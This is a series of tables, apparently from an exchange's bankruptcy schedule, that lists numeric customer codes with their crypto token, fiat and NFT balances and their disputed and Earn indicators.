| 07428555 | | BRZ[2], BTC[.10983535], CUSDT[2], DOGE[1], ETH[1.33898543], ETHW[1.33842303], TRX[2], USD[0.00] | Yes | |
| 07428558 | | USD[1.46] | | |
| 07428560 | | BRZ[3], CUSDT[32], DOGE[4], GRT[2.05440701], SOL[0], TRX[5], USD[0.00] | Yes | |
| 07428562 | | BRZ[1], CUSDT[6], GRT[.00003534], USD[0.55] | | |
| 07428564 | | CUSDT[1], DOGE[1], SHIB[38], TRX[3], USD[0.01] | Yes | |
| 07428569 | | BAT[1.01579099], BF_POINT[300], BRZ[3], CUSDT[3], DAI[.00519752], DOGE[9.01859444], ETH[0], GRT[2], SHIB[3], SOL[1.0858694], TRX[3], USD[0.01] | Yes | |
| 07428572 | | USD[0.64] | | |
| 07428578 | Contingent, Disputed | DOGE[172.71205331], USD[0.00] | | |
| 07428586 | | BRZ[1], CUSDT[27], DOGE[644.07189489], ETH[3.35337125], ETHW[3.35337125], GRT[1], LINK[1], TRX[154.67293832], UNI[3.96460348], USD[4.00] | | |
| 07428589 | | DOGE[1], SHIB[4], USD[91.01] | | |
| 07428601 | | BTC[0], LTC[0], SOL[0], USD[0.04] | | |
| 07428602 | | CUSDT[3], TRX[4], USD[0.00], USDT[1] | | |
| 07428603 | | AUD[0.00], DOGE[0], TRX[0], USD[0.00], USDT[0], YFI[0] | | |
| 07428605 | | USD[0.00] | | |
| 07428608 | | BRZ[1], TRX[0], CUSDT[3], TRX[1], USD[0.00] | | |
| 07428613 | | USD[60.00] | | |
| 07428614 | | DOGE[.952], ETH[0], ETHW[.08], LINK[.999], LTC[.00322793], SOL[25.32891], SUSHI[8.94083939], USD[0.23] | | |
| 07428617 | | ETH[0], USD[0.00], USDT[0] | | |
| 07428621 | | NFT (517419475899862434/Romeo #1890)[1], NFT (529399631443017206/Good Boy #1267)[1] | | |
| 07428630 | | BTC[.00022003], CUSDT[4], DOGE[328.90592194], MATIC[11.77292323], SUSHI[1.25983311], TRX[1], UNI[1.13604575], USD[0.00] | Yes | |
| 07428634 | | BTC[0], CUSDT[2], DOGE[0], ETH[0], TRX[1], USD[0.00], USDT[0.00002422] | | |
| 07428640 | | BTC[.00086317], CUSDT[2], ETH[.01743045], ETHW[.008208], SHIB[1], TRX[18.14543716], USD[3.31] | Yes | |
| 07428642 | | ETH[.1314], ETHW[.1314] | | |
| 07428645 | | CUSDT[1], DOGE[75.18420224], USD[0.00] | | |
| 07428648 | | BCH[0], DOGE[19.06530755], SUSHI[0], USD[0.00], USDT[0.00000330] | | |
| 07428653 | | BRZ[2], GRT[1], MATIC[184.89621431], SOL[3.74680577], USD[0.00] | | |
| 07428661 | | BRZ[3], CUSDT[19], DOGE[1], SHIB[6], TRX[10.00087675], USD[0.00], USDT[1.08415761] | Yes | |
| 07428665 | | TRX[.012004], USDT[.00552372] | | |
| 07428667 | | USD[6.85] | | |
| 07428670 | | NFT (331405697843745888/Entrance Voucher #1155)[1] | | |
| 07428681 | | USD[10.54] | | |
| 07428687 | | CUSDT[2], DOGE[25.14534133], SOL[.10793889], TRX[81.31968181], USD[0.00], USDT[15.41751241] | | |
| 07428691 | | BTC[.00373595] | Yes | |
| 07428692 | | BRZ[1], DOGE[630.01171687], USD[0.00] | | |
| 07428698 | | USD[549.96] | | |
| 07428699 | | CUSDT[14.72844928], DOGE[0], USD[0.00], USDT[0] | Yes | |
| 07428702 | | CUSDT[2], DOGE[2], USD[0.01] | | |
| 07428713 | | BCH[.00743079], BTC[.00823993], CUSDT[3], ETH[.00645908], ETHW[.00645908], LTC[.05586668], MATIC[8.61259793], SHIB[2], SOL[.06222913], TRX[173.16912785], USD[0.00] | | |
| 07428716 | | CUSDT[1], ETH[.37349691], ETHW[.37349691], TRX[2], USD[0.00], USDT[0] | | |
| 07428721 | | BTC[0], DOGE[14], ETH[.00000001], ETHW[0], GRT[1], MATIC[.00000001], SHIB[25], SOL[0], TRX[2.00002600], USD[0.01], USDT[0] | | |
| 07428722 | | BTC[0], CUSDT[1], DOGE[7], TRX[0], USD[0.00] | | |
| 07428724 | | TRX[164.59952237], USD[0.00] | Yes | |
| 07428726 | | CUSDT[1], SHIB[1], USD[0.00] | | |
| 07428729 | | CUSDT[2], USD[0.00] | | |
| 07428731 | | TRX[.096], USD[0.00], USDT[0] | | |
| 07428732 | | USD[0.00] | | |
| 07428733 | | CUSDT[1], USD[0.00] | | |
| 07428736 | | DOGE[0], USD[0.00] | | |
| 07428741 | | CUSDT[1], ETH[.00000001], ETHW[.00000001], USD[0.01] | | |
| 07428744 | | DOGE[58.09265641], SHIB[3707452.67637434], USD[0.00] | Yes | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07428745 | | AVAX[0], BTC[0], ETH[0], ETHW[0.05779953], SOL[0.00000771], TRX[1], USD[71.78] | Yes | |
| 07428748 | | ETH[0], MATIC[0], USD[0.00] | | |
| 07428758 | | USD[99.87] | | |
| 07428759 | | BTC[.00035936], CUSDT[1524.37209363], DOGE[4], TRX[1], USD[0.01] | | |
| 07428765 | | BAT[927.22494459], BTC[0], CUSDT[0], DOGE[1861.48548272], ETH[0.00000362], ETHW[0], LINK[4.20341068], LTC[4.11160903], PAXG[0], SHIB[4], SUSHI[0], USD[0.01], USDT[0] | Yes | |
| 07428770 | | CUSDT[2], USD[0.00] | | |
| 07428777 | | BTC[0.00002240], DOGE[0], ETH[0.00048683], ETHW[0.00048683], SOL[0.00961913], USD[31191.99], USDT[0.00049402] | | |
| 07428782 | | BAT[.00004656], CUSDT[5], DOGE[1], GRT[.00002088], TRX[.00039368], USD[42.79] | Yes | |
| 07428788 | | USD[0.00] | | |
| 07428791 | | DOGE[.724], ETH[0.15648498], ETHW[0.15648498], SOL[7.2095], TRX[.5], USD[0.00] | | |
| 07428794 | | BAT[0], BTC[0], DOGE[0], ETH[0], TRX[0], USD[0.00], USDT[0] | | |
| 07428799 | | USD[10.00] | | |
| 07428806 | | CUSDT[2], LINK[22.51395103], LTC[3.88640494], USD[0.00] | Yes | |
| 07428809 | | USD[100.00] | | |
| 07428810 | | ETH[0.14781437], ETHW[0.14781437] | | |
| 07428826 | | DOGE[1], TRX[0] | | |
| 07428828 | | BTC[.00000197], DOGE[2], TRX[.00040646], USD[0.00], USDT[1.01935380] | Yes | |
| 07428829 | | BAT[0], DOGE[0], SHIB[7.40081919], USD[0.00], USDT[0] | Yes | |
| 07428836 | | BTC[0.00001610], SOL[.007206], USD[0.00], USDT[0], YFI[.000965] | | |
| 07428842 | | BTC[0], ETH[0], ETHW[0], SOL[0], USD[0.01] | | |
| 07428849 | Contingent, Disputed | BF_POINT[200], BRZ[ 54672013], CUSDT[5], USD[83.46] | | |
| 07428852 | | BCH[.01146986], CUSDT[1189.96111449], DOGE[223.3067282], LINK[.69064504], SOL[.01041117], TRX[40.74836946], USD[58.51], YFI[.00048902] | | |
| 07428857 | | BAT[1], BRZ[1], DOGE[3], TRX[1], USD[0.01] | | |
| 07428858 | | CUSDT[1], TRX[942.3106601], USD[0.63] | Yes | |
| 07428869 | | ETH[.02543163], ETHW[.02511699], SHIB[1.00917746], TRX[154.83955527], USD[33.18] | Yes | |
| 07428872 | | BTC[0], USD[0.51], USDT[0] | | |
| 07428877 | | TRX[0], USDT[1] | | |
| 07428883 | | DOGE[1.06459852], ETH[0], TRX[0], USD[0.01] | | |
| 07428892 | | BTC[0], DAI[0], ETH[0], SOL[0], TRX[0], USD[0.12], YFI[0] | | |
| 07428896 | | CAD[1.54], CUSDT[.3702131], DAI[.50946788], DOGE[6.60536342], TRX[.00000927], USD[7.64], USDT[0.02456762] | Yes | |
| 07428897 | | DAI[0], DOGE[1], ETHW[0.27180236], ETHW[0.27160892], LTC[.51552051], SHIB[2], USD[0.00] | Yes | |
| 07428904 | | BRZ[1], CUSDT[3], TRX[2], USD[0.00] | | |
| 07428905 | | NFT (499022058521547054/FTX - Off The Grid Miami #1658)[1] | | |
| 07428930 | | CUSDT[3], DOGE[116.77264011], LTC[.00000124], TRX[.00087597], USD[0.00] | | |
| 07428931 | | BTC[.01678293], USD[0.00] | | |
| 07428934 | | BTC[.03766786], DOGE[2], SHIB[2], SOL[19.07439659], TRX[1], USD[0.58] | Yes | |
| 07428939 | | DOGE[0], ETH[0], USD[0.06] | | |
| 07428940 | | CUSDT[1], DOGE[3], USD[0.00] | | |
| 07428941 | | USD[0.00] | | |
| 07428942 | | PAXG[.0009], SOL[2.71728], SUSHI[212.956], USD[0.12] | | |
| 07428947 | | BTC[0.00004802], ETH[0], ETHW[0.02092354], MATIC[0], SOL[0.00242000], TRX[.216], USD[0.38] | | |
| 07428952 | | BTC[.00020276], DOGE[2], ETH[0.00000220], ETHW[0.00000219], LTC[0], SHIB[12], TRX[5], USD[7.58] | Yes | |
| 07428954 | | BCH[0], CAD[0.00], EUR[0.00], GBP[0.00], USD[0.00], USDT[0] | | |
| 07428955 | | USD[0.00] | | |
| 07428958 | | USD[0.00] | | |
| 07428963 | | BTC[0], CUSDT[1], DOGE[0], TRX[3], USD[0.00] | | |
| 07428964 | | BAT[1.0165555], CUSDT[4], DOGE[0], ETH[0], GRT[1.00394214], SOL[0], TRX[1], UNI[0], USDT[1.09865087] | Yes | |
| 07428972 | | SHIB[1], USD[0.01] | | |
| 07428974 | | USD[0.01], USDT[0] | | |
| 07428976 | | BTC[.0011952], USD[3.92] | | |
| 07428977 | | USD[0.01] | | |
| 07428983 | | DOGE[1], USD[0.00], USDT[0.00000001] | | |
| 07428992 | | USD[0.01] | | |
| 07428993 | | DOGE[1], USD[0.00], USDT[109.40667556] | | |
| 07429001 | | BCH[0], DOGE[129], ETH[.021], SOL[0.99900000], TRX[0], UNI[0], USD[19.66] | | |
| 07429002 | | BAT[1], BRZ[4], CUSDT[3], TRX[4], USD[0.00] | | |
| 07429006 | | USD[0.00] | Yes | |
| 07429009 | | USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07429011 | | USD[1.13] | | |
| 07429018 | | SOL[2.93802347], SUSHI[8.432], USD[0.00], USDT[3.21826277] | | |
| 07429021 | | USD[0.00] | Yes | |
| 07429024 | | TRX[1], USD[0.00] | | |
| 07429029 | | CUSDT[2], TRX[1], USD[0.00] | | |
| 07429033 | | DOGE[3336.86692426], USD[0.00] | | |
| 07429034 | | AVAX[156.6432], BTC[.4196309], DOGE[.18], ETH[1.171127], ETHW[1.171127], NEAR[786.9562], SHIB[157964800], SOL[145.896], TRX[21342.288], USD[0.85] | | |
| 07429035 | | DOGE[31464.73389828], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07429037 | | BAT[0], BTC[0], DOGE[3.00000001], ETH[0], LINK[0], LTC[0], SHIB[3], SOL[0], SUSHI[0], TRX[0], USD[0.00], USDT[0], YFI[0] | Yes | |
| 07429041 | | BRZ[1], BTC[0.00139438], CUSDT[5], DOGE[139.60409714], LTC[0], TRX[1], USD[0.01] | | |
| 07429043 | | USD[0.00] | | |
| 07429046 | | BRZ[4], BTC[0], CUSDT[43], DOGE[0], ETH[0], GRT[1], SHIB[9], TRX[0.00002600], USD[0.00], USDT[0.00010875] | | |
| 07429048 | | BAT[36.0509256], BCH[.02002347], BRZ[92.08184251], BTC[.02089551], CUSDT[15578.7084372], DAI[55.02005405], DOGE[3382.66900266], ETH[1.2067251], ETHW[1.20621818], EUR[63.09], GBP[30.71], GRT[25.9481991], LINK[1.27654394], LTC[.88045371], MATIC[51.94058749], MKR[.01545642], PAXG[.12665904], SHIB[2], SOL[3.57627729], SUSHI[11.1139028], TRX[1357.25510483], UNI[3.23194158], USD[0.75], USDT[16.57204019], YFI[.00040569] | Yes | |
| 07429065 | | AAVE[.2464295], BAT[35.66351079], BCH[.05458354], BRZ[5.07952967], BTC[.01779741], CUSDT[2617.91027773], DAI[27.60670179], DOGE[1794.14888609], ETH[.38846888], ETHW[.38830558], GRT[18.12343852], LINK[2.470686], LTC[.64302995], MATIC[138.68529695], MKR[.07539053], NFT [298393957374762730/Mad Girl Series #14][1], NFT [356558036283110102/Mad Girl Series #16][1], NFT [400371514534944229/Space Dream #5][1], NFT [451560395706749458/Astro Stones #9][1], NFT [466047937744097520/Metaverse Masks #2][1], NFT [486690196841098487/Glacier lake ][1], NFT [555202452586917368/Astro Stones #71][1], NFT [572218907956797975/Astro Stones #51][1], PAXG[.01880437], SHIB[2653144.66978623], SOL[7.60921443], SUSHI[5.35639181], TRX[8], UNI[2.22986894], USD[883.54], USDT[56.30096587], YFI[.00224183] | Yes | |
| 07429068 | | NEAR[66.44015], USD[0.25] | | |
| 07429070 | | BRZ[1], CUSDT[1], DOGE[2196.22552571], TRX[1], USD[0.00] | | |
| 07429073 | | TRX[1.00989035], USD[0.00] | Yes | |
| 07429075 | | BTC[.0000168], USD[0.29] | | |
| 07429079 | | BRZ[3], CUSDT[1], DOGE[4], ETH[.00000001], ETHW[0], NFT [542789838209712637/Entrance Voucher #1921][1], TRX[9], USD[0.20] | | |
| 07429086 | | BAT[3.27649624], BRZ[3], CUSDT[8], DOGE[12685.79275209], GRT[3.15233987], USD[0.01], USDT[5.49408202] | Yes | |
| 07429087 | | AVAX[2.21486129], BAT[12.16047201], BRZ[21.29511524], CUSDT[691.81215051], DOGE[44.02276692], ETH[.15505576], ETHW[1.543542], GRT[2.02989523], SHIB[507], SOL[4.52657527], SUSHI[4.66729676], TRX[1951.97804191], USD[0.03], USDT[0.01406954] | Yes | |
| 07429091 | | BRZ[1], DOGE[1.00000376], USD[0.01] | | |
| 07429095 | | BCH[0], BTC[0], CUSDT[2], DOGE[0.00002637], ETH[0], GRT[0], LINK[0], LTC[0], PAXG[0], SUSHI[0], TRX[0], USD[0.01], YFI[0] | | |
| 07429098 | | SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07429106 | | BAT[.0024961], BRZ[1], DOGE[5], ETH[.00005149], ETHW[.00005149], SHIB[1], TRX[11], UNI[1.01651476], USD[0.01], USDT[2.09343850] | Yes | |
| 07429109 | | BTC[.0005] | Yes | |
| 07429113 | | GRT[0], USD[0.00] | Yes | |
| 07429119 | | DOGE[1], USD[0.00] | | |
| 07429124 | | BRZ[1], DOGE[3539.87915338], SHIB[664982.04548477], TRX[1], USD[0.00] | | |
| 07429128 | | USD[0.04] | | |
| 07429132 | | USD[0.06] | | |
| 07429137 | | BAT[0], BCH[0], BRZ[.00005631], BTC[0], CUSDT[0], DAI[0], DOGE[0], ETH[0.00000079], ETHW[0.00000079], LINK[0], SHIB[1], SOL[0], TRX[0], USD[0.04], USDT[0.00000001] | Yes | |
| 07429146 | | DOGE[2], USD[10.00] | | |
| 07429149 | | CUSDT[2], DOGE[2], USD[0.01] | | |
| 07429151 | | SOL[.07347576], USD[0.00], USDT[0] | | |
| 07429152 | | CUSDT[1], DOGE[3], GRT[2843.67736774], MATIC[742.44982357], SHIB[1], SOL[30.82450716], TRX[1], USD[1059.88] | | |
| 07429154 | | CUSDT[1], DOGE[1], ETHW[.15264292], SHIB[2], USD[0.00] | Yes | |
| 07429155 | | USD[0.18] | | |
| 07429157 | | CUSDT[1], DOGE[0], ETH[0], ETHW[0], TRX[293.39673168], USD[2.50], USDT[0] | Yes | |
| 07429158 | | BRZ[2], CUSDT[2], ETH[3.06699106], ETHW[11.91364965], USD[0.00] | Yes | |
| 07429161 | | CUSDT[16], DOGE[987.84074982], TRX[5], USD[0.01] | Yes | |
| 07429165 | | USD[0.00] | | |
| 07429168 | | BRZ[1], CUSDT[17], DOGE[449.0857797], TRX[645.9556951], USD[0.32], USDT[5.44904497] | | |
| 07429169 | | CUSDT[1], DOGE[119.70484971], USD[20.00] | | |
| 07429170 | | BAT[2.08843794], BRZ[2], DOGE[11.53392032], TRX[13168.7396652], USD[0.00] | Yes | |
| 07429181 | | CUSDT[1], USD[0.00] | Yes | |
| 07429183 | | ETH[.795617], ETHW[2.795617], SOL[.0064], USD[1307.76], USDT[0] | | |
| 07429187 | | CUSDT[3], DOGE[0], TRX[0], USD[0.01] | | |
| 07429189 | | TRX[.000001], USD[8.62], USDT[1.7087] | | |
| 07429191 | | EUR[0.00], SOL[0], USD[1.07], YFI[0] | | |
| 07429198 | | TRX[2], USD[0.00] | | |
| 07429214 | | BTC[0], DOGE[.43583859], USD[0.00], USDT[1.00403532] | | |
| 07429215 | | USD[50.00] | | |
| 07429225 | | AAVE[0], BAT[0], BTC[0.00387599], DAI[0], DOGE[0], ETH[0.11562448], ETHW[0.11450107], LTC[0], MATIC[0], MKR[0], SHIB[2], SOL[8.18303757], UNI[0], USD[0.00], YFI[0] | Yes | |
| 07429227 | | USD[0.00], USDT[0] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07429228 | | USD[0.01], USDT[0] | | |
| 07429229 | | AVAX[.0818], BTC[0.00000839], USD[1.79] | | |
| 07429230 | | BF_POINT[300], BTC[.00000009], ETH[0], LTC[.00001031], SHIB[2], SOL[0], SUSHI[.00089123], USD[459.81], USDT[1.00002739] | Yes | |
| 07429231 | | SOL[0] | | |
| 07429238 | | USD[0.00] | | |
| 07429244 | | BRZ[540.5591378], BTC[.018421], CUSDT[1180.93041814], DOGE[11107.69369877], SHIB[2], SOL[2.18843756], TRX[1734.26714609], USD[0.00], USDT[3] | | |
| 07429248 | | BAT[0], BTC[0], DOGE[2], TRX[2], UNI[0] | | |
| 07429251 | | USD[0.02] | | |
| 07429253 | | CUSDT[3], DOGE[1112.43727321], USD[0.39] | | |
| 07429264 | | BRZ[2], CUSDT[4], DOGE[0], GRT[0], SUSHI[.0005652], TRX[1], USD[0.01] | | |
| 07429270 | | USDT[0] | | |
| 07429278 | | BTC[0], DOGE[0], ETH[0], LTC[0], SOL[0], TRX[0], USD[0.00] | | |
| 07429279 | | CUSDT[2], TRX[1], USD[108.28] | | |
| 07429281 | | CUSDT[2], SHIB[393281.30913004], USD[0.00] | | |
| 07429284 | | BTC[0.00788332], USD[0.00], USDT[0] | | |
| 07429297 | | BTC[.00001876] | | |
| 07429298 | | USD[200.00] | | |
| 07429300 | | BCH[0], BRZ[3], BTC[0], CUSDT[15.00009476], DOGE[1.00004841], ETH[0], ETHW[0], GRT[1], LTC[0], SOL[0], TRX[3.00001443], USD[0.00], YFI[0.00015616] | | |
| 07429303 | | CUSDT[1], TRX[197.79407389], USD[0.00] | | |
| 07429311 | | BRZ[1], DOGE[.49717813], TRX[1], USD[0.00] | | |
| 07429313 | | BAT[1.0165555], BRZ[2], CUSDT[5], DOGE[4], ETH[0], GRT[0], MATIC[0], NFT (36366589809254502/Valley #1)[1], SOL[0], TRX[1], USD[0.01] | Yes | |
| 07429326 | | DOGE[1], ETH[.04302303], ETHW[.04302303], USD[20.00] | | |
| 07429327 | | BRZ[2], CUSDT[2], DOGE[52007.46567496], USD[0.00] | Yes | |
| 07429328 | | TRX[10.1079756] | Yes | |
| 07429339 | | USD[0.01] | | |
| 07429346 | | SOL[.00449936], USDT[0.00000002] | | |
| 07429354 | | BTC[0], DOGE[0], ETH[0], ETHW[0.00033303], GRT[0], LINK[0], LTC[0], SOL[0], TRX[0.53377350], USD[0.00], USDT[0.00305480] | | |
| 07429357 | | BAT[1], CUSDT[3], DOGE[515.0556069], TRX[2.39667454], USD[0.01] | | |
| 07429359 | | CUSDT[12], DOGE[2], SHIB[5], TRX[0], USD[0.00] | Yes | |
| 07429363 | | BAT[.624], DOGE[.456], ETH[.000004], ETHW[.000004], GRT[89.012], LINK[2.0916], LTC[1.0056], SOL[.0072], TRX[3986.536], USD[2.20] | | |
| 07429364 | | BAT[1], BRZ[2], BTC[.01399211], CUSDT[60.76247869], DOGE[13936.93031047], ETH[.28112266], ETHW[.28092734], GRT[56.41896587], LTC[1.16952672], SOL[2.57365316], SUSHI[4.18381762], TRX[3], USD[0.00], USDT[1.04754282] | Yes | |
| 07429367 | | TRX[13293.25070312], USD[0.00] | | |
| 07429369 | | CUSDT[2], DOGE[1], USDT[0] | | |
| 07429375 | | BTC[0], ETH[0.00015886], SOL[.00568339], USD[0.69], USDT[0] | | |
| 07429383 | | USD[0.00] | | |
| 07429384 | | BRZ[1], CUSDT[6], DOGE[3.00003785], TRX[.00898177], USD[0.01] | Yes | |
| 07429391 | | DOGE[2], ETHW[.05905373], TRX[1], USD[0.00] | Yes | |
| 07429398 | | BTC[0], ETH[0] | | |
| 07429405 | | DOGE[1693.40876816], USD[0.00] | | |
| 07429406 | | BTC[0], TRX[1], USD[0.00] | | |
| 07429407 | | BTC[.00023072] | | |
| 07429413 | | DOGE[1], USD[0.00] | | |
| 07429416 | | BAT[.996], BTC[.0058764], SOL[.996], UNI[.996], USD[3.41] | | |
| 07429425 | | NFT (520251590510568808/Entrance Voucher #4367)[1] | | |
| 07429426 | | BTC[0], DOGE[1.00002448], USD[0.00] | | |
| 07429427 | | BF_POINT[100], CUSDT[3], DOGE[1], USD[0.00], USDT[0] | | |
| 07429429 | | CUSDT[10], DOGE[0], ETH[0], TRX[4], USD[0.00], USDT[0] | Yes | |
| 07429438 | | BRZ[1], BTC[0], CUSDT[2], DOGE[4], TRX[0], USDT[1.00013640] | | |
| 07429445 | | CUSDT[3.00001001], DOGE[1], SHIB[10949974.69065914], TRX[.907435], USD[0.00] | Yes | |
| 07429453 | | USD[10.00] | | |
| 07429457 | | DOGE[2], USD[0.00] | | |
| 07429461 | | DOGE[1], USD[0.00] | Yes | |
| 07429463 | | DOGE[1], SOL[0], USD[0.00] | Yes | |
| 07429464 | | USD[0.00] | | |
| 07429486 | | USD[0.22] | | |
| 07429492 | | BTC[0], ETH[0], SOL[0], SUSHI[.00000001], USD[0.00], USDT[1.11842900] | | |
| 07429495 | | CUSDT[1], SUSHI[3.55955091], USD[0.00] | | |
| 07429503 | | SOL[.06121459], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07429504 | | BAT[0], BTC[0], DOGE[0], ETH[0], ETHW[0], SOL[0.00000001], TRX[3], USD[0.00], USDT[0.00000001] | | |
| 07429510 | | BTC[.00002556], USD[0.02], USDT[0] | | |
| 07429513 | | CUSDT[1], ETH[0], TRX[2], USD[0.00] | | |
| 07429520 | | BRZ[8.86613829], CUSDT[41], MATIC[.00047897], TRX[185.11812466], USD[0.00] | Yes | |
| 07429524 | | BTC[.02472077], ETH[.02], ETHW[.02], SOL[.41], SUSHI[7.47], USD[45.95] | | |
| 07429525 | | BRZ[1], USD[0.00], USDT[0] | | |
| 07429550 | | BRZ[1], CUSDT[10], DOGE[1], TRX[1], USD[0.00] | | |
| 07429563 | | CUSDT[1], DOGE[10.69323186], SUSHI[.00006776], TRX[0], USD[0.00], USDT[0.00043087] | | |
| 07429566 | | BTC[0], CUSDT[4], DOGE[0], GRT[1], TRX[2], USD[16.09] | | |
| 07429568 | | ETH[.0001117], ETHW[.0001117], LINK[.0556], LTC[.00748], USD[3.00] | | |
| 07429584 | | BTC[0], CUSDT[1], DOGE[0], SOL[0], TRX[2], USD[0.00] | | |
| 07429593 | | TRX[1], USD[0.60] | Yes | |
| 07429594 | | DOGE[0], ETH[0], USD[0.05] | | |
| 07429596 | | USD[200.00] | | |
| 07429599 | | CUSDT[10], NFT (292477539173026228/Entrance Voucher #3162)[1], SOL[0], USD[0.00] | Yes | |
| 07429603 | | DOGE[100.62282007], SOL[.99992543], USD[26.03] | | |
| 07429606 | | AAVE[0], AVAX[0], BTC[0], DOGE[0], ETH[0], ETHW[-0.00174177], LINK[0], LTC[0], MATIC[0], SOL[0], SUSHI[0], TRX[0], UNI[0], USD[0.03] | | |
| 07429611 | | AVAX[.08465275], BAT[4.05918474], BF_POINT[400], BRZ[1], CUSDT[.00049465], DAI[0], DOGE[13.04090420], ETH[0.07812472], ETHW[0.00057511], MATIC[0.03464059], NFT (311210792146290868/Brick World #52)[1], NFT (339004549792362228/Brick World #54)[1], NFT (339346071668680396/Brick World #12)[1], NFT (357205371077351501/Brick World #53)[1], NFT (369509462144790775/Brick World #50)[1], NFT (381719883116332507/Brick World #46)[1], NFT (416986063750373221/Brick World #48)[1], NFT (451563205476192544/Brick World #21)[1], NFT (497056343916762162/Entrance Voucher #4408)[1], NFT (504678665245174573/Brick World #51)[1], NFT (526687663736990105/Brick World #49)[1], SHIB[11], SOL[0.00008103], TRX[14], USD[652.12], USDT[0.00000934] | Yes | |
| 07429613 | | USD[0.01] | | |
| 07429629 | | USD[8.73] | | |
| 07429647 | | ETH[0], USD[0.00] | | |
| 07429651 | | USD[0.00] | | |
| 07429653 | | DOGE[1.00587392], USD[0.00] | | |
| 07429654 | | SOL[106], USD[1.52] | | |
| 07429656 | | CUSDT[2], USD[0.24] | | |
| 07429662 | | ETH[1.53240997], ETHW[1.53240997] | | |
| 07429668 | | CUSDT[1], TRX[385.84268208], USD[0.00] | Yes | |
| 07429674 | | BTC[.01205458], TRX[1], USD[0.00] | | |
| 07429675 | | USDT[0] | | |
| 07429676 | | CUSDT[0], DOGE[0], ETH[0], TRX[1], USD[0.00] | | |
| 07429677 | | ETH[1.8634051], ETHW[1.86260548], LINK[33.20195107], SHIB[1], USD[0.00] | Yes | |
| 07429682 | | AVAX[1.0338792], BRZ[3], BTC[.00064979], CUSDT[28.00541295], DOGE[7061.29380611], ETH[.31695331], ETHW[.31677702], LINK[1.09411468], MATIC[15.43888411], SHIB[3345343.64893209], SOL[1.03310378], TRX[11.00038092], USD[0.00], USDT[.00000814] | Yes | |
| 07429687 | Contingent, Disputed | USD[0.00] | | |
| 07429688 | | DOGE[.143], TRX[.712003], USD[0.75] | | |
| 07429694 | | BRZ[1], LTC[.38208138], SOL[82.0609431] | | |
| 07429699 | | USD[0.11] | | |
| 07429704 | | CUSDT[3], USD[0.00] | | |
| 07429706 | | BTC[0], NFT (327880806646804164/3446)[1], USD[0.01], USDT[0] | | |
| 07429707 | | ETH[.00000001], ETHW[0], USDT[2.6832104] | | |
| 07429716 | | BTC[0], ETH[0], ETHW[1.16589642], TRX[.000003], USD[0.01], USDT[0] | | |
| 07429729 | | BTC[.00000911], USD[0.00], USDT[0] | | |
| 07429734 | | BTC[0.00017799], SOL[.007985], USD[1.00] | | |
| 07429738 | Contingent, Disputed | BTC[0], LTC[0], USD[0.00], USDT[0] | | |
| 07429740 | | BTC[.0001], UNI[1], USD[0.01] | | |
| 07429741 | | BTC[.00244535], CUSDT[5], DOGE[1107.7481193], ETH[.06598467], ETHW[.06516387], LTC[.54393118], SHIB[1], TRX[1], USD[0.00] | Yes | |
| 07429742 | | AVAX[.29299756], SHIB[5], TRX[1], USD[0.08], USDT[0.00000001] | Yes | |
| 07429746 | | BTC[.0018] | | |
| 07429751 | | BTC[.10766852], CUSDT[2], DOGE[2.00151511], ETH[.77338457], ETHW[.77383457], GRT[1], LTC[13.08985793], TRX[5], USD[0.00] | | |
| 07429754 | | BAT[1.0165555], BRZ[1], CUSDT[1], DOGE[5.1108917], TRX[2], USD[0.00], USDT[1.10188501] | Yes | |
| 07429762 | | BAT[2], BRZ[3], BTC[.05042319], CUSDT[8], DOGE[2445.93007237], ETH[.21825434], ETHW[.21825434], LINK[14.6502602], LTC[2.01125231], TRX[3], USD[50.00] | | |
| 07429764 | | BCH[0], USD[1917.25], USDT[0] | | |
| 07429765 | | BTC[.00868013], CUSDT[1], USD[0.00] | | |
| 07429772 | | AAVE[0], BTC[0.00000001], ETH[0], LINK[0.03977816], SOL[0], UNI[0.03257920], USD[0.00], USDT[.00598] | | |
| 07429774 | | BTC[0], SOL[0], USD[2924.77], USDT[0] | Yes | |
| 07429780 | | USD[0.01] | | |
| 07429783 | | AUD[0.00], BTC[0], USD[0.00] | | |

| Customer Code | Contingent, Unliquidated, or Disputed Indicator | Total Crypto Token / Fiat / NFT [Quantity/NFT ID] | Earn Indicator | Token / Fiat in Lend |
|---|---|---|---|---|
| 07429785 | | USD[0.58] | | |
| 07429787 | | USD[0.01] | Yes | |
| 07429788 | | BRZ[1], CUSDT[2], DOGE[1002.69554245], ETH[0], ETHW[0], SOL[.28230277], SUSHI[21.52614238], UNI[9.13894513], USD[0.00] | Yes | |
| 07429792 | | CUSDT[1.1831], SOL[0.44957250], USD[6.48], USDT[0.02114241] | | |
| 07429799 | | DOGE[3843.24397179], ETH[0], SHIB[16088357.03869589], TRX[2], UNI[58.09236742], USD[0.00] | Yes | |
| 07429802 | | GRT[1], SHIB[1], USD[0.01], USDT[0] | Yes | |
| 07429806 | | USD[2.38], USDT[0] | | |
| 07429814 | | TRX[139.368], USDT[0.08656815] | | |
| 07429816 | | BCH[.03750674], CUSDT[1], DOGE[4], LTC[.10042737], PAXG[.01130222], TRX[321.74695727], USD[0.00], YFI[.00055103] | | |
| 07429819 | | BRZ[2], CUSDT[39], DOGE[21.26236899], SOL[.00056703], TRX[7], USD[0.00] | Yes | |
| 07429823 | | CUSDT[1], TRX[808.51005341], USD[0.00] | | |
| 07429824 | | BRZ[1], CUSDT[6], DOGE[1], TRX[2], USD[0.01] | Yes | |
| 07429828 | | BTC[.00051], DOGE[1], TRX[0] | | |
| 07429830 | | USD[5.00] | | |
| 07429833 | | BAT[2], BRZ[4], CUSDT[10], DOGE[3193.88885526], GRT[6], LINK[1], TRX[6], USD[0.00], USDT[6.00000001] | | |
